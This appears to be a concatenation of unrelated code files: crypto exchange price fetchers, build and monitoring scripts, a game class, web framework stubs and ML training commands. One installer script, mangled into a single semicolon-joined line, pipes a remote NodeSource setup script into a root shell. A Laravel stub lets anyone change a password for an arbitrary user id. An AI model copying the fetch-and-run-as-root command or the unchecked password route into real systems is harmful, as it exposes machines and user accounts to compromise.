addr.getState(), addr.getCountry(),
addr.getZipCode(), cinfo.getEmail(), cinfo.getTelephone());
//Collection liColl = po.getAllItems();
Collection liColl = po.getData().getLineItems();
Iterator liIt = liColl.iterator();
while((liIt != null) && (liIt.hasNext())) {
LineItem li = (LineItem) liIt.next();
supplierOrderXDE.addLineItem(li.getCategoryId(), li.getProductId(), li.getItemId(),
li.getLineNumber(), li.getQuantity(), li.getUnitPrice());
}
return supplierOrderXDE.getDocumentAsString();
}
}
|
echo 'KERNEL=="ttyUSB*", ATTRS{idVendor}=="10c4", ATTRS{idProduct}=="ea60", MODE:="0666", GROUP:="dialout", SYMLINK+="rplidar"' >/etc/udev/rules.d/rplidar.rules
service udev reload
sleep 2
service udev restart
|
<reponame>hunterbdm/crypto-streamdeck<filename>classes/data.js<gh_stars>1-10
const request = require('request');
const WebSocket = require('ws');
let data = {};
let lastBTCPrice;
data.allCoins = [];
data.binancePairs = [];
data.bittrexPairs = [];
data.cryptopiaPairs = [];
/*
https://api.coinmarketcap.com/v1/ticker/?limit=2000
https://www.cryptopia.co.nz/api/GetMarkets
https://api.binance.com/api/v1/ticker/allBookTickers
https://bittrex.com/api/v1.1/public/getmarkets
*/
data.getPriceCryptopia = function(ticker, callback) {
request({
method: 'get',
url: `https://www.cryptopia.co.nz/api/GetMarkets`
}, (err, resp, body) => {
if (err) {
log(`Error when pulling ${ticker} data: ${err}`, 'error');
}
else if (resp.statusCode != 200) {
log(`Bad res(${resp.statusCode}) when pulling ${ticker} data`, 'error');
}
else {
try {
body = JSON.parse(body).Data;
let c = t.find(body, {Label: ticker});
if (!c) return log(`${ticker} could not be found on cryptopia`, 'error');
if (ticker.includes('/USDT'))
return callback(t.fixUsd(c.LastPrice.toString()));
else
return callback(t.fixSats(c.LastPrice.toString()));
}
catch(err) {
log(`Failed to parse ${ticker} data: ${err}`, 'error');
}
}
})
}
data.getPriceBinance = function(ticker, callback) {
request({
method: 'get',
url: `https://api.binance.com/api/v1/ticker/24hr`,
qs: {
symbol: ticker.replace('/', '')
}
}, (err, resp, body) => {
if (err) {
log(`Connection error when pulling ${ticker} data: ${err}`, 'error');
}
else if (resp.statusCode != 200) {
log(`Bad response(${resp.statusCode}) when pulling ${ticker} data`, 'error');
}
else {
try {
let c = JSON.parse(body);
if (ticker.includes('USDT'))
return callback(t.fixUsd(c.lastPrice.toString()));
else
return callback(t.fixSats(c.lastPrice.toString()));
}
catch(err) {
log(`Failed to parse ${ticker} data: ${err}`, 'error');
}
}
})
}
data.getPriceBittrex = function(ticker, callback) {
request({
method: 'get',
url: `https://bittrex.com/api/v1.1/public/getticker`,
qs: {
market: ticker.replace('/', '-')
}
}, (err, resp, body) => {
if (err) {
log(`Connection error when pulling ${ticker} data: ${err}`, 'error');
}
else if (resp.statusCode != 200) {
log(`Bad response(${resp.statusCode}) when pulling ${ticker} data`, 'error');
}
else {
try {
body = JSON.parse(body);
if (ticker.includes('USDT'))
return callback(t.fixUsd(body.result.Last.toString()));
else
return callback(t.fixSats(body.result.Last.toString()));
}
catch(err) {
log(`Failed to parse ${ticker} data: ${err}`, 'error');
}
}
})
}
data.getAllCoins = function() {
log('Pulling all coins...');
request({
url: 'https://api.coinmarketcap.com/v1/ticker/?limit=2000'
}, (err, resp, body) => {
if (err) {
log(`Unable to pull coins from CoinMarketCap, retrying...`, 'error');
log(err, 'error');
return setTimeout(() => data.getAllCoins(), 1000);
}
else if (resp.statusCode != 200) {
log(`Unable to pull coins from CoinMarketCap, retrying...`, 'error');
log(`Got response code ${resp.statusCode}`, 'error');
return setTimeout(() => data.getAllCoins(), 1000);
}
else {
try {
body = JSON.parse(body);
let allCoins = [];
for (let i = 0; i < body.length; i++) {
allCoins.push({
symbol: body[i].symbol,
id: body[i].id,
name: `${body[i].symbol} (${body[i].name})`
})
}
mainWin.webContents.send('updateCoins', allCoins);
log('Finished pulling all coins', 'info');
}
catch(err) {
log(`Unable to parse data from CoinMarketCap, retrying...`, 'error');
log(err, 'error');
return setTimeout(() => data.getAllCoins(), 1000);
}
}
})
}
data.getBinancePairs = function() {
log('Pulling all Binance pairs...');
request({
url: 'https://api.binance.com/api/v1/ticker/allBookTickers'
}, (err, resp, body) => {
if (err) {
log(`Unable to pull pairs from Binance, retrying...`, 'error');
log(err, 'error');
return setTimeout(() => data.getBinancePairs(), 1000);
}
else if (resp.statusCode != 200) {
log(`Unable to pull pairs from Binance, retrying...`, 'error');
log(`Got response code ${resp.statusCode}`, 'error');
return setTimeout(() => data.getBinancePairs(), 1000);
}
else {
try {
body = JSON.parse(body);
let allPairs = [];
for (let i = 0; i < body.length; i++) {
allPairs.push(body[i].symbol);
}
data.binancePairs = allPairs;
}
catch(err) {
log(`Unable to parse data from Binance, retrying...`, 'error');
log(err, 'error');
return setTimeout(() => data.getBinancePairs(), 1000);
}
}
})
}
data.getBittrexPairs = function() {
log('Pulling all Bittrex pairs...');
request({
url: 'https://bittrex.com/api/v1.1/public/getmarkets'
}, (err, resp, body) => {
if (err) {
log(`Unable to pull pairs from Bittrex, retrying...`, 'error');
log(err, 'error');
return setTimeout(() => data.getBittrexPairs(), 1000);
}
else if (resp.statusCode != 200) {
log(`Unable to pull pairs from Bittrex, retrying...`, 'error');
log(`Got response code ${resp.statusCode}`, 'error');
return setTimeout(() => data.getBittrexPairs(), 1000);
}
else {
try {
body = JSON.parse(body).result;
let allPairs = [];
for (let i = 0; i < body.length; i++) {
allPairs.push(body[i].MarketName);
}
data.bittrexPairs = allPairs;
}
catch(err) {
log(`Unable to parse data from Bittrex, retrying...`, 'error');
log(err, 'error');
return setTimeout(() => data.getBittrexPairs(), 1000);
}
}
})
}
data.getCryptopiaPairs = function() {
log('Pulling all Cryptopia pairs...');
request({
url: 'https://www.cryptopia.co.nz/api/GetMarkets'
}, (err, resp, body) => {
if (err) {
log(`Unable to pull pairs from Cryptopia, retrying...`, 'error');
log(err, 'error');
return setTimeout(() => data.getCryptopiaPairs(), 1000);
}
else if (resp.statusCode != 200) {
log(`Unable to pull pairs from Cryptopia, retrying...`, 'error');
log(`Got response code ${resp.statusCode}`, 'error');
return setTimeout(() => data.getCryptopiaPairs(), 1000);
}
else {
try {
body = JSON.parse(body).Data;
let allPairs = [];
for (let i = 0; i < body.length; i++) {
allPairs.push(body[i].Label);
}
data.cryptopiaPairs = allPairs;
}
catch(err) {
log(`Unable to parse data from Cryptopia, retrying...`, 'error');
log(err, 'error');
return setTimeout(() => data.getCryptopiaPairs(), 1000);
}
}
})
}
module.exports = data; |
package com.darian.springbootjmx.dynamicBean;
import lombok.Data;
@Data
public class DefaultData implements com.darian.springbootjmx.dynamicBean.Data {
private Long id;
private String name;
private Integer age;
}
|
JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk-amd64 groovy g.groovy
|
#!/bin/sh -e
MRTGDIR=/etc/mrtg
WEBDIR=/usr/share/nginx/html
MRTGCFG=${MRTGDIR}/mrtg.cfg
[[ ! -d "${MRTGDIR}" ]] && mkdir -p ${MRTGDIR}
[[ ! -d "${WEBDIR}" ]] && mkdir -p ${WEBDIR}
if [ -n "${HOSTS}" ]; then
hosts=$(echo ${HOSTS} | tr '[,;]' ' ')
for asset in ${hosts}; do
COMMUNITY=$(echo $asset | cut -d: -f1)
HOST=$(echo $asset | cut -d: -f2)
NAME=$(snmpwalk -Oqv -v2c -c ${COMMUNITY} ${HOST} .1.3.6.1.2.1.1.5)
[[ ! -f "${MRTGDIR}/conf.d/${NAME}.cfg" ]] && /usr/bin/cfgmaker --ifref=name --output=${MRTGDIR}/conf.d/${NAME}.cfg "${COMMUNITY}@${HOST}"
done
else
COMMUNITY=${1:-"public"}
HOST=${2:-"localhost"}
NAME=$(snmpwalk -Oqv -v2c -c ${COMMUNITY} ${HOST} .1.3.6.1.2.1.1.5)
[[ ! -f "${MRTGDIR}/conf.d/${NAME}.cfg" ]] && /usr/bin/cfgmaker --ifref=name --output=${MRTGDIR}/conf.d/${NAME}.cfg "${COMMUNITY}@${HOST}"
fi
env LANG=C /usr/bin/mrtg ${MRTGCFG}
env LANG=C /usr/bin/mrtg ${MRTGCFG}
env LANG=C /usr/bin/mrtg ${MRTGCFG}
/usr/bin/indexmaker --columns=1 ${MRTGCFG} > ${WEBDIR}/index.html
chown -R nginx:nginx ${WEBDIR}
/usr/sbin/nginx &
NGINXID=$!
/usr/sbin/crond -f -L /proc/self/fd/1 -l debug &
CRONDID=$!
trap "kill ${NGINXID} ${CRONDID}" SIGINT SIGHUP SIGTERM SIGQUIT EXIT
wait
|
import Phaser from 'phaser-ce';
import Human from 'src/app/chars/base/human';
import { MovementMouse, MovementKeys } from 'src/app/sprites/human';
import UIIngame from 'src/app/sprites/ui/ingame';
import { get as getItem, getAll as getAllItems, Item } from 'src/app/chars/items';
interface Equips {
armor: Item;
weapon: Item;
accessory: Item;
};
interface Config {
game: Phaser.Game;
group: Phaser.Group;
map: any;
x?: number;
y?: number;
movement: MovementMouse | MovementKeys;
controls: { [key:string]: Phaser.Key };
};
interface Inventory extends Item {
equipped: boolean;
};
class Hero extends Human {
private debug: boolean = false;
private ingame: UIIngame;
controls: { [key:string]: Phaser.Key };
gold: number = 100;
inventory: Inventory[] = [];
stats = {
hp: {
base: 100,
extra: 0,
battle: 100,
},
mp: {
base: 100,
extra: 0,
battle: 100,
},
atk: {
base: 10,
extra: 0,
battle: 10,
},
def: {
base: 10,
extra: 0,
battle: 10,
},
};
equipment: Equips = {
armor: null,
weapon: null,
accessory: null,
};
constructor({ x, y, game, group, map, movement, controls }: Config) {
super({
game,
x: x * map.tilesize,
y: y * map.tilesize,
z: 0,
sprite: 'people',
delimiter: 0,
group,
map,
movement,
});
this.name = 'Hero';
this.controls = controls;
this.ingame = new UIIngame({
id: 'ingame',
game: this.game,
subject: this,
});
// register mouse down input upon `create` bc we only need to do it once
if (this.movement.type === 'mouse') {
game.input.onDown.add(() => {
// for hero movement
const movement = this.movement as MovementMouse;
const cursor = {
x: Math.floor(movement.input.x / map.tilesize),
y: Math.floor(movement.input.y / map.tilesize),
};
// ignore out of bounds clicks
if (cursor.x >= 0 && cursor.y >= 0 && cursor.x < map.grid.length && cursor.y < map.grid.length) {
this.generatePaths({
x: cursor.x,
y: cursor.y,
});
}
});
}
// register keyboard controls
this.controls.p.onDown.add(() => {
this.dispatch('action');
});
this.controls.l.onDown.add(() => {
this.dispatch('cancel');
});
this.controls.w.onDown.add(() => {
this.dispatch('up');
});
this.controls.s.onDown.add(() => {
this.dispatch('down');
});
this.controls.o.onDown.add(() => {
if (!this.ingame.sprite.visible && this.inMap) {
this.ingame.show();
} else {
// TODO: toggling everything to hide is still not working
this.ingame.hide();
}
});
// DEBUGGING
this.controls[','].onDown.add(() => {
if (this.debug) {
this.gold += 1000;
}
});
this.controls['.'].onDown.add(() => {
this.debug = !this.debug;
});
}
setEquipped(id: string, equipped: boolean) {
const item = this.inventory.filter(i => id === i.id)[0];
item.equipped = equipped;
}
purchaseItem(id: string) {
const item = getItem(id);
this.gold -= item.price;
this.acquireItem(item.id);
}
acquireItem(id: string) {
const item = getItem(id);
this.inventory.push({
...item,
equipped : item.consumable ? null : false,
});
}
useItem(item: Inventory) {
if (!item.consumable) return;
this.applyItemEffect(item.id);
}
discardItem(item: Inventory) {
if (item.equipped) return;
this.inventory = this.inventory.filter(i => item.id !== i.id);
}
equipItem(id: string) {
const item = getItem(id);
if (item.consumable) return; // shouldn't be able to equip a consumable
// unequip the existing one first
if (this.equipment[item.type]) {
this.unequipItem(this.equipment[item.type].id);
}
this.equipment[item.type] = item;
this.applyItemEffect(item.id);
this.setEquipped(id, true);
}
unequipItem(id: string) {
const item = getItem(id);
if (item.consumable) return; // shouldn't be able to equip a consumable
this.equipment[item.type] = null;
this.applyItemEffect(item.id, true);
this.setEquipped(id, false);
}
applyItemEffect(id: string, negate = false) {
const item = getItem(id);
item.effects.forEach((effect) => {
const target = item.consumable ? 'battle' : 'extra';
// consumables can't go higher than the base + extra
// while non-consumable stacks as permanent extra
const maxValue = this.stats[effect.property].base + this.stats[effect.property].extra
const newValue = this.stats[effect.property][target] + (effect.value * (negate ? -1 : 1));
this.stats[effect.property][target] = item.consumable ? Math.min(maxValue, newValue) : newValue;
});
}
}
export default Hero;
|
package sshutil
// HostGroup defines expected attributes for a host group that a host might belong to.
type HostGroup struct {
ID string
Name string
}
// Host defines expected attributes for an ssh host.
type Host struct {
HostID string `json:"hid"`
HostGroups []HostGroup `json:"host_groups"`
Hostname string `json:"hostname"`
}
|
#!/usr/bin/env bash
set -e
# Sanity checks for required environment variables.
if [ -z "$BUILD_TYPE" ]; then
echo "Error: Environment variable BUILD_TYPE is unset."
exit 1
fi
if [ -z "$BUILD_DARTPY" ]; then
echo "Info: Environment variable BUILD_DARTPY is unset. Using OFF by default."
BUILD_DARTPY=OFF
fi
if [ -z "$BUILD_DOCS" ]; then
echo "Info: Environment variable BUILD_DOCS is unset. Using OFF by default."
BUILD_DOCS=OFF
fi
if [ -z "$COMPILER" ]; then
echo "Info: Environment variable COMPILER is unset. Using gcc by default."
COMPILER=gcc
fi
if [ -z "$CODECOV" ]; then
echo "Info: Environment variable CODECOV is unset. Using OFF by default."
CODECOV=OFF
fi
if [ -z "$BUILD_DIR" ]; then
echo "Error: Environment variable BUILD_DIR is unset. Using $PWD by default."
BUILD_DIR=$PWD
fi
if [ -f /etc/os-release ]; then
# freedesktop.org and systemd
. /etc/os-release
OS=$NAME
VER=$VERSION_ID
elif type lsb_release >/dev/null 2>&1; then
# linuxbase.org
OS=$(lsb_release -si)
VER=$(lsb_release -sr)
elif [ -f /etc/lsb-release ]; then
# For some versions of Debian/Ubuntu without lsb_release command
. /etc/lsb-release
OS=$DISTRIB_ID
VER=$DISTRIB_RELEASE
elif [ -f /etc/debian_version ]; then
# Older Debian/Ubuntu/etc.
OS=Debian
VER=$(cat /etc/debian_version)
elif [ -f /etc/SuSe-release ]; then
# Older SuSE/etc.
echo "Not supported"
exit 1
elif [ -f /etc/redhat-release ]; then
# Older Red Hat, CentOS, etc.
echo "Not supported"
exit 1
else
# Fall back to uname, e.g. "Linux <version>", also works for BSD, etc.
OS=$(uname -s)
VER=$(uname -r)
fi
# Set number of threads for parallel build
# Ref: https://unix.stackexchange.com/a/129401
if [ "$OSTYPE" = "linux-gnu" ]; then
num_available_threads=$(nproc)
elif [ "$OSTYPE" = "darwin" ]; then
num_available_threads=$(sysctl -n hw.logicalcpu)
else
num_available_threads=1
echo "$OSTYPE is not supported to detect the number of logical CPU cores."
fi
num_threads=$num_available_threads
while getopts ":j:" opt; do
case $opt in
j)
num_threads="$OPTARG"
;;
\?)
echo "Invalid option -$OPTARG" >&2
;;
esac
done
# Set compilers
if [ "$COMPILER" = "gcc" ]; then
export CC=gcc
export CXX=g++
elif [ "$COMPILER" = "clang" ]; then
export CC=clang
export CXX=clang++
else
echo "Info: Compiler isn't specified. Using the system default."
fi
# Build API documentation and exit
if [ $BUILD_DOCS = "ON" ]; then
. "${BUILD_DIR}/.ci/travis/build_docs.sh"
exit 0
fi
echo "====================================="
echo ""
echo " [ SYSTEM INFO ]"
echo ""
echo " OS : $OS $VER ($(uname -m))"
echo " Cores : $num_threads / $num_available_threads"
echo " Compiler: $COMPILER $($CXX --version | perl -pe '($_)=/([0-9]+([.][0-9]+)+)/')"
echo " CMake : $(cmake --version | perl -pe '($_)=/([0-9]+([.][0-9]+)+)/')"
echo ""
echo "====================================="
# Run CMake
mkdir build && cd build
if [ "$OSTYPE" = "linux-gnu" ]; then
install_prefix_option="-DCMAKE_INSTALL_PREFIX=/usr/"
fi
cmake .. \
-DCMAKE_BUILD_TYPE=$BUILD_TYPE \
-DDART_BUILD_DARTPY=$BUILD_DARTPY \
-DDART_VERBOSE=ON \
-DDART_TREAT_WARNINGS_AS_ERRORS=ON \
-DDART_BUILD_EXTRAS=ON \
-DDART_CODECOV=$CODECOV \
${install_prefix_option}
# Check format
if [ "$OSTYPE" = "linux-gnu" ] && [ $(lsb_release -sc) = "bionic" ]; then
make check-format
fi
# DART: build, test, and install
make -j$num_threads all tutorials examples tests
ctest --output-on-failure -j$num_threads
make -j$num_threads install
# dartpy: build, test, and install
if [ "$BUILD_DARTPY" = "ON" ]; then
make -j$num_threads dartpy
make pytest
make -j$num_threads install-dartpy
fi
# Codecov
if [ "$CODECOV" = "ON" ]; then
make -j$num_threads codecov
fi
# DART: build an C++ example using installed DART
cd $BUILD_DIR/examples/hello_world
mkdir build && cd build
cmake ..
make -j$num_threads
# dartpy: run a Python example using installed dartpy
if [ "$BUILD_DARTPY" = "ON" ]; then
cd $BUILD_DIR/python/examples/hello_world
python3 main.py
fi
|
// Controller for handling user authentication with Reddit
public class RedditAuthController : Controller
{
private readonly IRedditAuthService _redditAuthService;
public RedditAuthController(IRedditAuthService redditAuthService)
{
_redditAuthService = redditAuthService;
}
public IActionResult Authenticate()
{
// Redirect users to Reddit for authentication
return Redirect(_redditAuthService.GetRedditAuthUrl());
}
public IActionResult AuthCallback(string code)
{
// Handle the callback from Reddit after user authentication
_redditAuthService.HandleAuthCallback(code);
return RedirectToAction("Index", "Home");
}
}
// Service for interacting with the Reddit API to retrieve saved posts
public interface IRedditService
{
Task<List<RedditPost>> GetSavedPosts(string accessToken);
}
public class RedditService : IRedditService
{
public async Task<List<RedditPost>> GetSavedPosts(string accessToken)
{
// Implement logic to retrieve saved posts using the Reddit API
}
}
// View for displaying the saved posts and initiating the backup process
@page
@model RedditSavedBackup.Pages.SavedPostsModel
<h2>Saved Reddit Posts</h2>
<ul>
@foreach (var post in Model.SavedPosts)
{
<li>@post.Title</li>
}
</ul>
<form asp-action="BackupPosts">
<button type="submit">Backup Posts</button>
</form>
// Logic for backing up the saved posts to a chosen storage location
public class BackupService
{
public void BackupPosts(List<RedditPost> posts, string storageLocation)
{
// Implement logic to backup the saved posts to the specified storage location
}
} |
// Define routes in web.php
Route::get('/user/profile', 'UserProfileController@showProfile')->name('user.profile');
Route::post('/user/profile/update-picture', 'UserProfileController@updateProfilePicture')->name('user.profile.update-picture');
Route::get('/user/change-password/{id}', 'UserProfileController@showChangePasswordForm')->name('user.change-password');
Route::post('/user/change-password/{id}', 'UserProfileController@changePassword')->name('user.change-password.post');
// UserProfileController.php
class UserProfileController extends Controller {
public function showProfile() {
// Retrieve user data and pass it to the profile view
$userData = User::find(Auth::id());
return view('user.profile', compact('userData'));
}
public function updateProfilePicture(Request $request) {
// Handle profile picture update logic
// Validate and store the new profile picture
// Redirect back to the profile page with a success message
}
public function showChangePasswordForm($id) {
// Retrieve user data and pass it to the change password view
$userData = User::find($id);
return view('user.change-password', compact('userData'));
}
public function changePassword(Request $request, $id) {
// Handle password change logic
// Validate and update the user's password
// Redirect back to the profile page with a success message
}
}
// user.profile.blade.php
<!-- Display user profile picture and real name -->
<img alt="User profile picture" src='{{url("public/uploads/userPic/avatar.jpg")}}' class="profile-user-img img-responsive img-circle asa">
<h3 class="profile-username text-center">{{$userData->real_name}}</h3>
<a class="btn btn-primary btn-block" href='{{route("user.change-password", $userData->id)}}'><b>{{ trans('message.form.change_password') }}</b></a>
// user.change-password.blade.php
<!-- Form to change the user's password -->
<form method="post" action='{{route("user.change-password.post", $userData->id)}}'>
@csrf
<!-- Password change form fields -->
</form> |
#### 51
python3.8 train.py \
--algorithm astar-near \
--exp_name ballscreen_og_22_d8 \
--trial 1 \
--train_data data/helpers/allskip5/train_fullfeatures_2.npy \
--valid_data data/helpers/allskip5/test_fullfeatures_2.npy \
--test_data data/helpers/allskip5/test_fullfeatures_2.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 51 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 6 \
--symbolic_epochs 15 \
--max_num_units 16 \
--min_num_units 4 \
--penalty 0 \
--class_weights "0.1,0.9"
python3.8 train.py \
--algorithm rnn \
--exp_name ballscreen_og_ \
--trial 1 \
--train_data data/helpers/allskip5/train_fullfeatures_2.npy \
--valid_data data/helpers/allskip5/test_fullfeatures_2.npy \
--test_data data/helpers/allskip5/test_fullfeatures_2.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 51 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 50 \
--symbolic_epochs 15 \
--max_num_units 128 \
--min_num_units 4 \
--penalty 0 \
--class_weights "0.1,0.9"
####
python3.8 train.py \
--algorithm rnn \
--exp_name ballscreen \
--trial 1 \
--train_data data/helpers/allskip5/train_fullfeatures.npy \
--valid_data data/helpers/allskip5/test_fullfeatures.npy \
--test_data data/helpers/allskip5/test_fullfeatures.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 47 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 10 \
--symbolic_epochs 15 \
--max_num_units 16 \
--min_num_units 4 \
--class_weights "0.1,0.9"
python3.8 train.py \
--algorithm rnn \
--exp_name 64_ballscreen \
--trial 1 \
--train_data data/helpers/allskip5/train_fullfeatures.npy \
--valid_data data/helpers/allskip5/test_fullfeatures.npy \
--test_data data/helpers/allskip5/test_fullfeatures.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 47 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 50 \
--symbolic_epochs 15 \
--max_num_units 64 \
--min_num_units 4 \
--class_weights "0.1,0.9"
python3.8 train.py \
--algorithm astar-near \
--exp_name ballscreen_nopen_5 \
--trial 1 \
--train_data data/helpers/allskip5/train_fullfeatures.npy \
--valid_data data/helpers/allskip5/test_fullfeatures.npy \
--test_data data/helpers/allskip5/test_fullfeatures.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 47 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 5 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 6 \
--symbolic_epochs 15 \
--max_num_units 16 \
--min_num_units 4 \
--penalty 0 \
--class_weights "0.1,0.9"
#ballscreen w/ og features only
python3.8 train.py \
--algorithm astar-near \
--exp_name ballscreen \
--trial 1 \
--train_data data/helpers/allskip5/train_raw_trajs.npy \
--valid_data data/helpers/allskip5/test_raw_trajs.npy \
--test_data data/helpers/allskip5/test_raw_trajs.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 22 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 6 \
--symbolic_epochs 15 \
--max_num_units 16 \
--min_num_units 4 \
--class_weights "0.1,0.9"
# ballhandler
python3.8 train.py \
--algorithm astar-near \
--exp_name ballhandler \
--trial 1 \
--train_data data/helpers/allskip5/train_raw_trajs.npy \
--valid_data data/helpers/allskip5/test_raw_trajs.npy \
--test_data data/helpers/allskip5/test_raw_trajs.npy \
--train_labels data/helpers/allskip5/train_ballhandlers.npy \
--valid_labels data/helpers/allskip5/test_ballhandlers.npy \
--test_labels data/helpers/allskip5/test_ballhandlers.npy \
--input_type "list" \
--output_type "list" \
--input_size 22 \
--output_size 6 \
--num_labels 6 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 6 \
--symbolic_epochs 15 \
--penalty 0.01 \
--max_num_units 16 \
--min_num_units 4
|
def is_element_of(string, s):
if string in s:
return True
else:
return False
result = is_element_of("orange", ["apple", "banana", "orange"])
print(result) |
#!/bin/sh
export PATH=/bin:/usr/bin:/usr/local/bin
export d=`date +%m-%d-%Y`
if [ -e /scratch/roma/stapl_nightly_timing/hydra_dir/$d.0025.done ]
#if [ -e /scratch/roma/stapl_nightly_timing/hydra_dir/03-07-2010.0025.done ]
then
#the sleep is needed so the new times can be inserted into the db.
sleep 300
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/timings.php machine hydra set nightly type palgorithm container p_array > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_parray.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/timings.php machine hydra set nightly type palgorithm container p_vector > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_pvector.php
# /usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/timings.php machine hydra set nightly type palgorithm container p_matrix > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_pmatrix.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_array num_ts 10 class nonmutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_array_nonmutating.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_array num_ts 10 class mutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_array_mutating.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_array num_ts 10 class numeric > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_array_numeric.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_vector num_ts 10 class nonmutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_vector_nonmutating.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_vector num_ts 10 class mutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_vector_mutating.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_vector num_ts 10 class numeric > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_vector_numeric.php
# /usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_matrix num_ts 10 class nonmutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_matrix_nonmutating.php
# /usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_matrix num_ts 10 class mutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_matrix_mutating.php
# /usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_matrix num_ts 10 class numeric > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_matrix_numeric.php
/usr/local/bin/update-www -r /research/www/groups/rwergergroup/intranet/stapl_perf
else
exit 0
fi
|
<filename>sources/ReviewZ/src/main/java/vn/com/reviewz/dao/ProductDAO.java
package vn.com.reviewz.dao;
public interface ProductDAO {
}
|
#!/bin/sh
;SUDO_CMD=$(which sudo);;USER="$(id -un 2>/dev/null || true)";SUDO='';if [ "$USER" != 'root' ]; then;if [ ! -z $SUDO_CMD ]; then;SUDO='sudo';else cat >&2 <<-'EOF';Error: this installer needs the ability to run commands as root.;We are unable to find "sudo". Make sure its available to make this happen;EOF;exit 1;fi;fi;;RESET='[0m';RED='[0;31m';GREEN='[0;32m';YELLOW='[0;33m';log () { echo "[`date "+%Y.%m.%d-%H:%M:%S%Z"`]$1 $2"; };info () { log "$GREEN INFO$RESET $1"; };warn () { log "$YELLOW WARN$RESET $1"; };error () { log "$RED ERROR$RESET $1"; };;$SUDO dnf install -y gcc-c++ make;curl -sL https://rpm.nodesource.com/setup_12.x | $SUDO -E bash -;$SUDO dnf install nodejs;;; |
import os
from flask import Flask, render_template, request
from sqlalchemy import create_engine
app = Flask(__name__)
# Database setup
engine = create_engine(os.environ['DATABASE_URL'])
@app.route('/')
def index():
# Get the list of products from database
products = engine.execute("SELECT * FROM products").fetchall()
return render_template('index.html', products=products)
@app.route('/purchase', methods=['POST'])
def purchase():
# Get the data from the form
name = request.form.get('name')
email = request.form.get('email')
product_id = request.form.get('product_id')
price = request.form.get('price')
# Insert the data into database
